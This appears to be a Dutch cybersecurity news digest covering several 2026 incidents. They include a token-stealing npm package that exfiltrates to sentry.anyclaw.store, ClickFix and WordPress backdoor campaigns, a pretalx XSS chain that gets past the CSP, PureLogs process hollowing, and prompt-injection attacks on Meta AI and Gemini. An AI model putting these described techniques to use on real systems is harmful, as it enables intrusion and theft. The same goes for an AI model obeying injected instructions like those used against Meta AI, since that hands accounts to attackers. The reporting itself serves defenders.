Patiënten van diverse Nederlandse ziekenhuizen die gebruikmaken van de software van ChipSoft hebben weer toegang tot hun gegevens, en de uitwisseling van medische informatie tussen zorgverleners is hersteld. Veel ziekenhuizen, waaronder het Diakonessenhuis in de regio Utrecht, Meander Medisch Centrum in Amersfoort en het Martini Ziekenhuis in Groningen, melden dat hun digitale omgevingen weer bereikbaar zijn.

Dit herstel volgt op de ransomware aanval op zorgsoftwareleverancier ChipSoft, die op 7 april 2026 werd ontdekt. Na de ontdekking hadden ziekenhuizen uit voorzorg patiëntenportalen en digitale koppelingen offline gehaald om verdere verspreiding of schade te voorkomen. Naar schatting is tussen de 70 en 75 procent van de Nederlandse ziekenhuizen afhankelijk van de software van ChipSoft, wat de brede impact van het incident verklaart.

ChipSoft heeft eerder bevestigd dat bij de aanval persoonsgegevens van patiënten zijn gestolen, waaronder medische gegevens. Het bedrijf geeft echter aan te hebben voorkomen dat de gestolen data openbaar is gemaakt. Dit nieuwsbericht betreft een vervolg op de eerder gedekte ontwikkelingen rondom het ChipSoft-incident.

Bron: Skipr

Een veelgebruikte softwaretool, die door duizenden mobiele ontwikkelaars is gedownload, is ontdekt terwijl deze heimelijk authenticatietokens steelt. Op 27 mei 2026 publiceerde Aikido Security onderzoek over een kwaadaardig pakket op npm genaamd `codexui-android`. Dit pakket, een populaire webinterface op afstand voor OpenAI Codex (een taalmodel dat code schrijft), wordt wekelijks ongeveer 27.000 keer gedownload.

Charlie Eriksen, onderzoeker bij Aikido Security, ontdekte dat dit pakket vorige maand een supply chain aanval uitvoerde om gebruikersdata te stelen. Opmerkelijk is dat de aanvallers geen standaardmethoden zoals typosquatting of accountkaping gebruikten. In plaats daarvan ontwikkelden ze een daadwerkelijk nuttige tool, vermoedelijk om een legitieme gebruikersbasis op te bouwen voordat deze werd bewapend. Het kwaadaardige code bestaat niet in de publieke repository op GitHub, maar verschijnt alleen in het gepubliceerde pakket op npm, waardoor een standaard audit van de broncode dit zou missen.

De aanval wordt direct geactiveerd bij het laden van de module. De eerste regel van `dist-cli/index.js` importeert een verborgen script genaamd `chunk-PUR7OUAG.js`. Dit script controleert snel op lokale referenties. Indien gevonden, wordt een exfiltratieroutine gestart om `access_token`, `id_token`, `account ID` en de `refresh_token` uit het `auth.json`-bestand te stelen. Een bijzonder problematisch aspect is dat een `refresh_token` niet verloopt, waardoor aanvallers zich voor onbepaalde tijd kunnen voordoen als het slachtoffer.

Om het netwerkverkeer te verbergen, stuurt de code de gestolen gegevens naar een endpoint van de server genaamd `sentry.anyclawstore`. Deze naam werd opzettelijk gekozen om op te gaan in de normale telemetrie voor foutrapportage van Sentry. In de verborgen source map liet de auteur zelfs een duidelijke opmerking achter: "Send tokens to our startlog endpoint (always)".

De onderzoekers merkten in een blogpost op dat deze dreigingsactor ook Android mobiele apparaten target. De auteur publiceerde apps in de Google Play Store onder de ontwikkelaarsidentiteit BrutalStrike, die ook eigenaar is van een legitiem mobiel spel met meer dan 5 miljoen downloads. Twee specifieke apps, een betaalde productiviteitsapp genaamd `codex.app` en een andere genaamd "OpenClaw Codex Claude AI Agent", bevatten dezelfde kwaadaardige infrastructuur.

De apps voor Android doorstaan gemakkelijk de voorpublicatie beveiligingsscans van Google, omdat het initiële APK bestand van 26 MB er volledig schoon uitziet. Eenmaal geïnstalleerd, extraheert de app een Linux userland afgeleid van Termux naar privéopslag en start Node.js met behulp van PRoot. Vervolgens wordt een commando uitgevoerd om de nieuwste versie van het pakket op npm te installeren: `pnpm add codexui-android@latest`. De exfiltratie is actief sinds versie `2.1.0`.

Toen Eriksen de auteur confronteerde, plaatste deze kort een opmerking waarin hij beweerde de toegang tot zijn account op npm te zijn kwijtgeraakt. Dit werd kort daarna verwijderd en vervangen door een bedrijfsverklaring waarin elke diefstal van referenties werd ontkend. Vanaf vandaag zijn de kwaadaardige softwarepakketten en apps nog steeds online beschikbaar. De onderzoekers concludeerden: "ontwikkeltools voor AI worden een doelwit van hoge waarde, juist omdat de tokens krachtig en langdurig zijn... een dreigingsactor heeft veel moeite geïnvesteerd in het bouwen van een geloofwaardig, nuttig project om als dekmantel te gebruiken. De legitimiteit is de aanvalsvector. Naarmate tools voor AI zich verspreiden en ontwikkelaars naar productiviteitssnelkoppelingen grijpen, verwacht dan meer van dit soort aanvallen."

Bron: Aikido Security

Op een ondergronds forum is een aanbod verschenen voor een exploit die volgens de aanbieder misbruikmaakt van promptinjectie in het taalmodel Gemini 3.1. De crimineel claimt dat deze exploit de ingebouwde beveiligingsregels van het grote taalmodel kan omzeilen. Hoewel de advertentie geen specifieke technische details bevat, wordt er wel gesproken over een 'proof of concept' met bijbehorende screenshots en voorbeelden, die op verzoek beschikbaar zouden zijn voor geïnteresseerde kopers. De prijs voor de exploit wordt via privécontact besproken.

De claims over de functionaliteit van de exploit zijn op dit moment niet onafhankelijk geverifieerd. Er is geen informatie beschikbaar over welke specifieke versies van Gemini 3.1 kwetsbaar zouden zijn, welke vereisten er zijn voor een succesvolle aanval, of hoe betrouwbaar de aangeboden methode daadwerkelijk is. Dit aanbod past in een bredere, zorgwekkende trend waarbij technieken zoals 'jailbreaks' en promptinjectie voor taalmodellen steeds vaker als handelswaar op criminele markten verschijnen.

Organisaties die toepassingen inzetten die gebaseerd zijn op grote taalmodellen, doen er goed aan om proactieve beveiligingsmaatregelen te treffen. Dit omvat het zorgvuldig valideren van alle invoer, het continu monitoren van de uitvoer van de modellen, het strikt scheiden van rechten en het alert zijn op signalen die kunnen duiden op aanvallen via promptinjectie. Door deze stappen te volgen, kunnen potentiële risico's worden beperkt.

Bron: Cybercrimeinfo

Een ernstige kwetsbaarheid in de digitale assistent Meta AI van Instagram maakte het mogelijk om accounts over te nemen, zelfs als deze waren beveiligd met tweefactorauthenticatie. Kwaadwillenden konden door middel van promptinjectie, een techniek waarbij misleidende instructies worden gegeven, de assistent zover krijgen dat deze een wachtwoordherstelcode of een herstellink naar het e-mailadres van de aanvaller stuurde. Dit proces omzeilde de gebruikelijke identiteitscontroles van Instagram.

Elke aanvaller die de gebruikersnaam van een doelwit kende, kon dit overnameproces in gang zetten. De methode omvatte het gebruik van een VPN die overeenkwam met de geografische locatie van het doelwit. Vervolgens vroeg de aanvaller via de Meta AI een wachtwoordherstel aan, waarbij een eigen e-mailadres werd opgegeven voor de ontvangst van de herstellink of code.

Een prominent slachtoffer van deze methode was het gearchiveerde Instagramaccount van het Witte Huis uit de regeringsperiode van voormalig president Barack Obama. Dit account, dat sinds januari 2017 niet meer actief werd gebruikt, werd misbruikt om een afbeelding met een politieke boodschap te plaatsen. Meta heeft de hack inmiddels bevestigd, het account veiliggesteld en de ongeautoriseerd geplaatste inhoud verwijderd.

Volgens beveiligingsonderzoekers zijn op deze manier meer hoogwaardige accounts en korte, gewilde gebruikersnamen overgenomen, waarna ze werden doorverkocht via Telegram. Meta heeft verklaard dat de kwetsbaarheid inmiddels is verholpen. Dit incident benadrukt hoe digitale assistenten een nieuw en significant aanvalsoppervlak introduceren zodra zij in staat zijn gevoelige acties zoals wachtwoordherstel uit te voeren.

Bron: Neowin | Bron 2: tmz.com

Google introduceert een nieuwe beveiligingsfunctie in de Chrome-browser, genaamd Device Bound Session Credentials (DBSC), die ingelogde sessies cryptografisch koppelt aan het specifieke toestel waarop ze zijn aangemaakt. Deze maatregel is ontworpen om het voor cybercriminelen aanzienlijk moeilijker te maken om gestolen sessiecookies te misbruiken voor accountovernames.

Sessiecookies zijn al geruime tijd een geliefd doelwit voor aanvallers. Wanneer een aanvaller een sessiecookie bemachtigt, kan deze zich voordoen als een reeds aangemelde gebruiker, waardoor een nieuw wachtwoord of een multifactorauthenticatieproces niet nodig is. Dit maakt sessiekaping een bijzonder efficiënte methode voor het overnemen van accounts.

DBSC pakt dit probleem aan door sessies te verbinden met de unieke hardware van een apparaat. Op systemen met Windows maakt Chrome hiervoor gebruik van de Trusted Platform Module (TPM), terwijl toestellen met macOS de Secure Enclave inzetten. Bij het inloggen genereert Chrome niet alleen een sessiecookie, maar ook een cryptografisch sleutelpaar. De sessie blijft zodoende onlosmakelijk verbonden met die specifieke hardware. Een aanvaller die enkel de cookie weet te stelen, beschikt daardoor niet over de essentiële sleutels die nodig zijn om de sessie te misbruiken. Google verwacht dat dit de bruikbaarheid van gestolen sessies voor accountovernames aanzienlijk zal verminderen.

Google kondigde DBSC reeds in 2024 aan en is nu gestart met de brede uitrol van de functionaliteit. De functie wordt automatisch geactiveerd en kan niet handmatig worden uitgeschakeld door gebruikers. Voor klanten van Google Workspace zijn er geen administratieve handelingen vereist. Om DBSC te kunnen gebruiken, moeten systemen minimaal Chrome 146 draaien op Windows of Chrome 148 op macOS. Daarnaast is compatibele hardware noodzakelijk, zoals een TPM-chip op Windows systemen en de Secure Enclave op Macs.

Deze beveiligingsmaatregel komt op een moment dat malware die browsergegevens steelt, waaronder sessiecookies, steeds vaker wordt ingezet. Hoewel DBSC deze specifieke aanvalsvector minder aantrekkelijk maakt, benadrukt Google dat gebruikers waakzaam moeten blijven. De nieuwe beveiliging beschermt tegen het misbruik van gestolen cookies, maar voorkomt niet dat malware andere gevoelige gegevens buitmaakt.

Bron: itdaily.com

Dashlane, een bekende wachtwoordmanager, heeft een beveiligingsincident openbaar gemaakt waarbij gebruikersaccounts het doelwit waren van een grootschalige brute force aanval. De aanval begon op 31 mei 2026, zo meldt het bedrijf. Een externe dreigingsactor probeerde de twee-factor authenticatie (2FA) beveiligingen te omzeilen door herhaaldelijk authenticatiecodes te raden. Het doel was om ongeautoriseerde apparaten te registreren op de accounts van slachtoffers.

De aanval werd gedetecteerd door de geautomatiseerde beveiligingssystemen van Dashlane. Deze systemen reageerden door de verdachte activiteiten te blokkeren en de getroffen gebruikersaccounts preventief te vergrendelen. Dit leidde tot de vergrendeling van meerdere accounts, waardoor gebruikers tijdelijk geen toegang hadden tot hun wachtwoordmanager.

Een brute force aanval is een methode waarbij aanvallers systematisch combinaties van wachtwoorden of, in dit geval, authenticatiecodes proberen totdat de juiste combinatie wordt gevonden. Door het herhaaldelijk raden van 2FA-codes hoopten de aanvallers een tweede beveiligingslaag te doorbreken die normaal gesproken toegang tot een account beschermt, zelfs als het wachtwoord bekend is. Het succesvol registreren van een ongeautoriseerd apparaat zou de dreigingsactor in staat stellen om toekomstige inlogpogingen uit te voeren zonder de noodzaak van de 2FA-code, wat een aanzienlijk risico vormt voor de privacy en veiligheid van de opgeslagen gegevens.

Dashlane heeft in reactie op het incident stappen ondernomen om de beveiliging verder te versterken en gebruikers te informeren over de situatie. Hoewel de geautomatiseerde verdedigingsmechanismen de aanvallen hebben afgeslagen en ongeautoriseerde toegang tot zover bekend is voorkomen, benadrukt het incident het voortdurende gevaar van gerichte cyberaanvallen op accounts die gevoelige informatie bevatten, zoals wachtwoorden. Gebruikers van Dashlane die getroffen zijn, zullen waarschijnlijk instructies ontvangen om hun account te herstellen en opnieuw te beveiligen.

Bron: Dashlane

Een dreigingsactor, bekend als DriveSurge, voert grootschalige malware-distributiecampagnes uit door middel van ClickFix- en FakeUpdates-technieken op gecompromitteerde websites. Volgens onderzoekers van cybersecuritybedrijf SilentPush zijn duizenden websites gecompromitteerd in DriveSurge-campagnes om bezoekers om te leiden naar infrastructuur voor malwarelevering.

ClickFix is een social engineering tactiek die slachtoffers verleidt tot het kopiëren en uitvoeren van kwaadaardige commando's op hun systemen, vaak resulterend in malware-infecties onder het mom van het oplossen van een technisch probleem. Bij FakeUpdates-aanvallen lokken dreigingsactoren slachtoffers met frauduleuze software-updateprompts, meestal door browserupdates na te bootsen, om hen te verleiden tot het downloaden en installeren van kwaadaardige payloads.

SilentPush-onderzoekers melden dat de dreigingsactor DriveSurge voornamelijk functioneert als een initial access broker (IAB) die opereert op een pay-per-install (PPI) model, wat verdere aanvallen mogelijk maakt. Bezoekers van gecompromitteerde websites worden omgeleid via een Traffic Distribution System (TDS) genaamd zTDS. Dit systeem profileert hen en bepaalt of een FakeUpdates- of een ClickFix-lokmiddel geschikter is. zTDS is een open-source TDS dat al sinds minstens 2015 bestaat en dat DriveSurge sinds minstens september 2025 gebruikt. SilentPush stelt dat DriveSurge met zTDS duizenden legitieme websites met een hoge reputatie kaapt en bezoekers stilzwijgend omleidt naar malware, zonder medeweten van de eigenaren van de sites of hun bezoekers.

De FakeUpdates-lokmiddelen bevatten valse updateberichten voor browsers zoals Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet en UC Browser. De ClickFix-aanvallen omvatten PowerShell-commando's. Een specifiek geval, belicht in het SilentPush-rapport, betreft een valse update voor Firefox die een ZIP-archief downloadde met meerdere DLL's en een kwaadaardig uitvoerbaar bestand genaamd ‘Browser Update.exe’.

De onderzoekers identificeerden acht technische vingerafdrukken die aan de campagne zijn gekoppeld en die hielpen bij het identificeren van de DriveSurge-infrastructuur en gecompromitteerde websites. Hieronder valt een JavaScript-injectie volgens het patroon ‘t.js?site= ’, waarbij een unieke waarde aan elke gecompromitteerde website wordt toegekend. Door analyse ontdekte SilentPush meer dan 80 kwaadaardige injectiedomeinen en een reeks voorbereide domeinen die nog niet in aanvallen waren gebruikt. Bovendien ontdekten de onderzoekers een geobfusceerde JavaScript-payload die specifiek is ontworpen om macOS-desktopsystemen aan te vallen. Deze payload werd geleverd via verificatie-gerelateerde ClickFix-aanvallen die het klembord kapen, wat aangeeft dat de campagne verder reikt dan Windows. Gebruikers wordt aangeraden browserupdates alleen te downloaden via de instellingen van hun applicatie (Over > Controleren op updates) en geen commando's uit te voeren in de Windows-opdrachtprompt of Terminal die ze niet volledig begrijpen.

Bron: SilentPush | Bron 2: hubs.li

Een recente malwarecampagne heeft bijna 2.000 WordPress websites geïnfecteerd door op ingenieuze wijze command-and-control (C2) data te verbergen in commentaren op Steam Community profielen. De dreigingsactor maakt gebruik van onzichtbare Unicode-tekens om een payload te coderen die een URL naar een kwaadaardig script opbouwt. Door het platform van Valve te misbruiken, vermijdt de aanvaller het onderhouden van een aparte C2-infrastructuur en omzeilt deze traditionele detectiemethoden.

De campagne werd voor het eerst ontdekt in juli 2025. Sindsdien hebben beveiligingsexperts van GoDaddy malware aangetroffen op ongeveer 1.980 WordPress websites. Het is onduidelijk hoe de hackers de websites precies compromitteren, maar onderzoekers vermoeden dat de initiële infectievector varieert van gestolen admin-inloggegevens of gecompromitteerde FTP/SFTP-referenties tot de exploitatie van een kwetsbaar WordPress thema of plugin, of een supply chain compromis.

De eerste stage malware die op een website wordt geplaatst, gebruikt WordPress paginaloads om specifieke Steam-profielen te benaderen en tekst uit onschuldig lijkende commentaren te extraheren. Deze tekst bevat echter verborgen Unicode-tekens die kwaadaardige payloads verhullen, soms vermomd als ASCII-kunst.

GoDaddy onderzoekers beschrijven in een rapport dat de dreigingsactor zes onzichtbare Unicode-tekens gebruikt voor de gecodeerde payload: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063) en Invisible plus (U+2064). De decoder negeert alle zichtbare tekens en koppelt de onzichtbare aan een overeenkomstig nummer; vervolgens worden deze omgezet naar een binaire representatie en worden bytes gereconstrueerd uit de binaire stroom. Deze codering stelt binaire data in staat om te worden ingebed in normaal ogende tekst, waarbij de zichtbare tekens dienen als camouflage terwijl de onzichtbare tekens de daadwerkelijke payload dragen.

Volgens de onderzoekers wordt de gedecodeerde payload gebruikt om een `hello-mywordl[.]info` URL op te bouwen. Deze URL dient JavaScript-code die in elke frontend WordPress pagina wordt geïnjecteerd. Op basis van de bestandsnamen, zoals `asahi-jquery-min-bundle` en `lodash.core.min.js`, wordt de opgehaalde malware vermomd als een legitieme JavaScript-bibliotheek. De laatste fase van de aanval is de implementatie van een backdoor die reageert op speciaal geconstrueerde POST-verzoeken die een specifieke authenticatie cookie bevatten. Als de `tEcaKKXEsb` cookie aanwezig is, accepteert de backdoor base64 gecodeerde PHP code via een POST-parameter.

GoDaddy beschrijft verschillende ontwijkingsmechanismen die door de malware worden gebruikt, waaronder geobfusceerde strings met octale en hexadecimale escapes, gerandomiseerde functienamen, nep uitgeschakelde loggingcode en het gebruik van standaard API's van WordPress, waardoor de malware zich vermengt met normale activiteit.

Website-eigenaren kunnen zich verdedigen door te controleren op verwijzingen naar Steam Community URL's, verdachte externe JavaScript-injecties, uitgaande verbindingen van WordPress servers naar Steam, en onverwachte scripts die laden vanaf domeinen zoals `hello-mywordl[.]info`. Andere indicatoren zijn onzichtbare Unicode-tekens, verdachte `_transient_caption_` cache-ingangen, uitgeschakelde SSL-verificatie in cURL-verzoeken en POST-verzoeken die de authenticatie cookies of de `new_code` parameter van de malware bevatten. De onderzoekers adviseren beveiligingsteams om prioriteit te geven aan het herstellen vanaf een bekende goede backup van vóór de infectiedatum. Indien dit niet mogelijk is, moet het handmatige schoonmaakproces grondig zijn, omdat aanvallers de verwijderde code opnieuw kunnen installeren via de backdoor als een component actief blijft.

Bron: Australische overheid | Bron 2: godaddy.com | Bron 3: hubs.li

Aanvallers hebben tientallen npm packages van Red Hat voorzien van infostealer malware, zo is recentelijk bekendgemaakt. Deze kwaadaardige software is specifiek ontworpen om diverse gevoelige gegevens, ook wel "secrets" genoemd, van besmette systemen te stelen.

Volgens StepSecurity zijn er maar liefst 31 gecompromitteerde packages geïdentificeerd, die gezamenlijk meer dan 100.000 wekelijkse downloads genereren. De specifieke packages die het betreft vallen onder de noemer @redhat-cloud-services npm packages. Ontwikkelaars die deze besmette pakketten downloaden en installeren, riskeren directe infectie van hun ontwikkelomgeving.

De malware wordt door StepSecurity omschreven als een uiterst effectieve 'credential harvester'. Deze functionaliteit stelt de malware in staat om een breed scala aan secrets, credentials en tokens te verzamelen. Tot de doelwitten behoren gevoelige toegangsgegevens voor kritieke ontwikkel- en cloudplatformen, waaronder GitHub Actions, AWS (Amazon Web Services), GCP (Google Cloud Platform), Azure (Microsoft Azure), Kubernetes, HashiCorp Vault, npm en CircleCI.

Naast het stelen van deze waardevolle gegevens, richt de malware zich ook op de softwareprojecten waar de getroffen ontwikkelaar aan werkt. Een bijzonder zorgwekkend aspect van de aanval is de methode waarmee de aanvallers hun invloed proberen uit te breiden. Met de gestolen npm tokens tracht de malware besmette versies te publiceren van andere packages waar het slachtoffer beheerderstoegang toe heeft. Dit kan leiden tot een verdere verspreiding van de malware binnen de supply chain.

Cybersecuritybedrijf JFrog Security heeft de aanval toegeschreven aan een specifieke groep aanvallers, bekend onder de naam TeamPCP. Deze groep heeft in het verleden al een spoor van vergelijkbare supply chain aanvallen achtergelaten. Eerdere slachtoffers van TeamPCP omvatten prominente organisaties en projecten zoals SAP, Checkmarx, Lightning, Intercom, Trivy en GitHub zelf. De aanhoudende activiteit van TeamPCP onderstreept de noodzaak voor organisaties en ontwikkelaars om hun software supply chain zorgvuldig te beveiligen en alert te zijn op verdachte activiteiten binnen hun ontwikkelprocessen.

Bron: StepSecurity en JFrog Security | Bron 2: github.com

Cybersecurityonderzoekers van het bedrijf Novee Security hebben een gevaarlijke kwetsbaarheid ontdekt in pretalx, populaire open-source software, die cybercriminelen in staat stelt accounts van organisatoren volledig over te nemen zonder dat zij een enkele link hoeven aan te klikken. Het betreft een stored Cross-Site Scripting (XSS) kwetsbaarheid met een hoge ernst, aangeduid als CVE-2026-41241, en heeft een hoge CVSS-score van 8.7.

Pretalx wordt veel gebruikt voor het beheren van Call for Papers (CFP)-processen en planning voor evenementen variërend van hacker-camps tot academische symposia. De kwetsbaarheid werd geanalyseerd door Elad Meged, een founding engineer en beveiligingsonderzoeker bij Novee. Hij merkte op dat, hoewel verschillende evenementen van buitenaf onafhankelijk lijken, ze op dezelfde onderliggende codebase draaien. Dit betekent dat één enkele kwetsbaarheid een systemische blootstelling creëert binnen de hele sector.

De blogpost van Novee, gedeeld met Hackread.com, onthult dat de aanvalsvector lage privileges en lage complexiteit vereist. Elke geregistreerde gebruiker kan deze misbruiken door eenvoudigweg HTML of JavaScript in de zoekbalk-dropdown aan de organisatorzijde te plaatsen. Hierbij wordt de conferentiewebsite misleid om kwaadaardige code uit te voeren die is verborgen in normale presentatie-inzendingen.

Onderzoekers leggen uit dat pretalx een strikt Content Security Policy (CSP) hanteert met `script-src ‘self’` en HTML5 `innerHTML` scriptonderdrukking om ongeautoriseerde code-uitvoering te voorkomen. Aanvallers kunnen deze verdedigingsmechanismen echter volledig omzeilen via een geketende exploit. Hierbij uploaden ze een `.js` payload-bestand, vermomd als normaal leermateriaal of dia's, naar het CFP-platform. Omdat het bestand direct op het platform wordt opgeslagen, neemt het de domeinoorsprong van de site over. De aanvaller plaatst vervolgens een `iframe`-tag in de titel van de inzending.

Wanneer een organisator zoekt naar veelvoorkomende woorden zoals "intro" of "machine learning", wordt de titel door de "typeahead" zoekfunctie gerenderd. Het `srcdoc`-attribuut creëert een nieuwe documentcontext die het HTML5-scriptblok omzeilt. Omdat pretalx een `frame-src`-richtlijn mist, voert de `iframe` het geüploade script uit, waardoor het CSP-filter wordt gepasseerd. Dit geeft het script volledige toegang tot de sessie van de organisator voor directe overname, gegevensdiefstal en geautomatiseerde acceptatie van sprekers.

De analyse onthulde ook een secundaire techniek die helemaal geen JavaScript vereist. Door een `image`-tag in een inzendingstitel te plaatsen, maakt de browser automatisch een geauthenticeerd GET-verzoek om de afbeeldingsbron te laden. Op het moment dat de zoekresultaten worden gerenderd, activeert dit verzoek een "superuser-demotion"-endpoint, waardoor de admin-privileges van de organisator permanent worden ingetrokken.

Verder bleek uit het onderzoek hoe dreigingsactoren geautomatiseerde AI-softwareagenten kunnen gebruiken om deze kwetsbaarheid op grotere schaal te misbruiken. Ze kunnen een agent inzetten om openbare pretalx-implementaties te scrapen, aangepaste presentatie-samenvattingen te genereren met behulp van grote taalmodellen (LLM's), en tegelijkertijd tientallen conferenties automatisch te overspoelen met de kwaadaardige payload. Ze hoeven alleen de zoektermen te targeten die organisatoren het meest gebruiken om hun eigen inzendingen geaccepteerd te krijgen, waardoor ze theoretisch een acceptatiegraad van 100% kunnen behalen voor 40 of meer conferenties.

Traditionele applicatiebeveiligingstools falen om deze aanvallen te detecteren. Onderzoekers merkten op: “Statische analyse markeert `innerHTML`. DAST-scanners herhalen payloads tegen formulieren.” Ze legden uit dat, hoewel tools individuele bugs als laag risico classificeren, ze niet kunnen modelleren hoe een autonome agent deze onderdelen kan samenvoegen tot een volledige keten.

Novee heeft het pretalx-team en maker Tobias Kunze geprezen voor een snelle en coöperatieve reactie. De kwetsbaarheid is officieel gepatcht op 27 mei 2026, in pretalx versie v2026.1.0.

Bron: Novee Security | Bron 2: github.com | Bron 3: nvd.nist.gov

Onderzoekers op het gebied van cybersecurity hebben details bekendgemaakt over een nieuwe kwaadaardige aanval op de toeleveringsketen, gericht op ontwikkelaars die OpenAI Codex gebruiken via een legitiem ogende webinterface op afstand. Het betreft het npm-pakket `codexui-android`, dat op GitHub en npm wordt geadverteerd als een webinterface voor OpenAI Codex en meer dan 29.000 wekelijkse downloads aantrekt. Het pakket is nog steeds beschikbaar via de repository.

Deze activiteit is opmerkelijk omdat het geen traditionele aanval betreft die gebruikmaakt van typosquatting of wegwerppakketten om ontwikkelaars te misleiden. In plaats daarvan is de kwaadaardige code ingebed in een functioneel npm-pakket dat actief is ontwikkeld. De bijbehorende GitHub-repository is nog steeds schoon. Volgens Charlie Eriksen, onderzoeker bij Aikido Security, heeft elke aanroep van het pakket in de afgelopen maand stilzwijgend authenticatietokens van Codex geëxfiltreerd naar een server die onder controle staat van de aanvallers.

De schadelijke wijzigingen zouden ongeveer een maand na de publicatie van het pakket in het register zijn geïntroduceerd, waarschijnlijk in een poging om gebruikersvertrouwen op te bouwen en het bereik te vergroten. Het npm-account dat aan het pakket is gekoppeld, is "friuns", ook bekend als Igor Levochkin.

In het pakket bevindt zich code die de inhoud van het `~/.codex/auth.json` bestand van Codex extraheert en deze exfiltreert naar een externe server, `sentry.anyclaw[.]store`, die zich voordoet als Sentry, een legitiem platform voor applicatiemonitoring en foutopsporing. De vastgelegde gegevens omvatten de `access_token`, `refresh_token`, `id_token` en account-ID. Eriksen benadrukt dat de `refresh_token` niet verloopt, waardoor een aanvaller die deze in handen heeft, zich onbeperkt en stilzwijgend kan voordoen als het slachtoffer. Een gestolen Codex `refresh_token` geeft meer dan alleen toegang tot een chatinterface; het biedt persistente, stille toegang tot alles wat dat account kan doen.

OpenAI waarschuwt in zijn ondersteuningsdocumentatie dat gebruikers `~/.codex/auth.json` moeten behandelen als een wachtwoord, omdat het toegangstokens bevat. Het wordt afgeraden om het te committen, in tickets te plakken of in chats te delen.

Het npm-pakket is niet de enige methode die de dreigingsactor gebruikt om Codex-ontwikkelaars aan te vallen. Aikido heeft een Android-applicatie waargenomen met de naam "OpenClaw Codex Claude AI Agent" (pakketnaam: `gptos.intelligence.assistant`), die het npm-pakket uitvoert binnen zijn PRoot-sandbox en de Codex-referenties naar hetzelfde eindpunt stuurt. De APK-applicatie zelf is klein (26 MB) en ziet er schoon uit bij een Play-scan voorafgaand aan publicatie. Bij de eerste uitvoering extraheert het een van Termux afgeleide Linux-gebruikersomgeving naar de privéopslag van de applicatie en voert Node.js daarin uit via PRoot. De versie is niet vastgepind, dus het apparaat haalt op wat momenteel op npm is gepubliceerd. De exfiltratie is al aanwezig sinds `codexui-android@0.1.82`. Het pakket draait binnen de PRoot-sandbox van de applicatie, waar de in-app Codex-aanmelding zijn `auth.json` schrijft. Zodra de gebruiker is aangemeld, leest het pakket dat bestand uit de sandbox en verzendt het de volledige OAuth-blob naar `sentry.anyclaw.store/startlog`.

De Android-applicatie, uitgebracht door een entiteit genaamd "BrutalStrike", heeft meer dan 50.000 downloads. Dezelfde exfiltratieketen is ook gesignaleerd in een tweede Android-applicatie die gekoppeld is aan BrutalStrike: "Codex" (pakketnaam: `codex.app`), die meer dan 10.000 keer is gedownload. De overige drie applicaties die de ontwikkelaar aanbiedt, bevatten deze functionaliteit niet.

Na contact op te nemen met de pakketauteur op GitHub, meldde Aikido dat deze aanvankelijk een opmerking plaatste waarin stond dat de toegang tot het npm-account was verloren. Vervolgens bewerkte de auteur de reactie en plaatste een andere waarin werd beweerd dat "dit probleem intern wordt onderzocht" en dat "de betreffende functionaliteit en gerelateerde gegevens zijn verwijderd". De auteur beweerde verder dat er geen referentiegegevens met derden zijn gedeeld, zonder te antwoorden waarom deze code alleen in de npm-pakketbuild was ingevoegd of waarom er überhaupt toegang tot de Codex-tokens nodig was. Het X-profiel dat aan de auteur is gekoppeld, bevat het domein `anyclaw[.]store`. WHOIS-records geven aan dat het domein op 12 april 2026 werd geregistreerd, slechts twee dagen nadat de allereerste versie van het npm-pakket (versie 0.1.72) naar npmjs[.]com werd geüpload.

Deze ontwikkeling komt op een moment dat dreigingsactoren steeds vaker echte tools en workflows voor ontwikkelaars van kunstmatige intelligentie (AI) aanvallen om referenties te stelen en dieper in de software-toeleveringsketen door te dringen.

Eind vorige maand ontdekte een Belgisch beveiligingsbedrijf ook dat een verwijderde Google API-sleutel tot 23 minuten lang actief blijft, een venster dat een aanvaller met toegang tot een gelekte sleutel kan benutten om toegang te krijgen tot gebruikersgegevens en andere API’s, inclusief die gerelateerd aan Google Gemini. De gemiddelde intrekkingstijd bedraagt ongeveer 16 minuten. Onderzoeker Joe Leon stelde dat een aanvaller met een verwijderde sleutel verzoeken kan blijven verzenden totdat deze een server bereikt die nog niet is bijgewerkt. Indien Gemini op het project is ingeschakeld, kunnen aanvallers geüploade bestanden dumpen en gecachte gesprekken exfiltreren. Hoewel Google aanvankelijk besloot het probleem niet te verhelpen, met de verklaring dat het een "bekende eigenschap van het systeem en geen beveiligingsprobleem" was, heeft de techgigant sindsdien besloten het te behandelen als een P0-bug, wat betekent dat het een ernstig probleem is dat onmiddellijk moet worden aangepakt. De bevindingen, net als een vergelijkbaar exploitatievenster van 4 seconden dat eerder werd waargenomen met verwijderde Amazon Web Services (AWS) toegangssleutels, benadrukken hoe vertragingen bij het intrekken van referenties exploiteerbaar zijn en kunnen worden gebruikt om ongeautoriseerde toegang te verkrijgen tot cloudomgevingen, terwijl verdedigers ervan uitgaan dat de referenties zijn ingetrokken.

Bron: Aikido Security | Bron 2: github.com | Bron 3: offensai.com

FortiGuard Labs heeft een nieuwe e-mailcampagne onthuld die Windows-gebruikers aanvalt met een datastelend programma genaamd PureLogs. De aanval begint met e-mails met valse aankooporders die slachtoffers verleiden een kwaadaardig archief te openen, genaamd "PO 2026-P0803.rar".

Na het openen van het archief wordt automatisch een verborgen script, "kpankocrs.js", uitgevoerd. Dit script plaatst een willekeurig genoemd bestand, zoals "ps_qnSEGUkU0LIY_1777592585573.ps1", in de map "C:\Temp". Het maakt gebruik van de script engine van Windows (wscript.exe) om PowerShell te activeren en systeembeperkingen te omzeilen.

De aanvallers passen de techniek process hollowing toe om detectie te voorkomen. Hierbij wordt een legitiem Windows-proces, in dit geval "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe", gekaapt. De veilige code van dit proces wordt vervangen door een kwaadaardige downloader module. Dit kapen gebeurt via specifieke commando's van het systeem: CreateProcessA() opent het legitieme programma in een bevroren staat, ZwUnmapViewOfSection() leegt het geheugen, WriteProcessMemory() injecteert de kwaadaardige code, en ResumeThread() dwingt de computer om de verborgen dreiging uit te voeren.

Zodra de malware actief is binnen MsBuild.exe, wordt een interne module genaamd "Iwnflr.exe" geëxtraheerd om de volgende fase te starten. Dit bestand laadt de bron "Eqxcpvgf.Ybrgdoxas" via ResourceManager.GetObject(). Vervolgens wordt deze bron ontsleuteld met het DES-algoritme en gedecomprimeerd met Gunzip, waarna een downloader met de naam "Rmiyj.dll" wordt samengesteld.

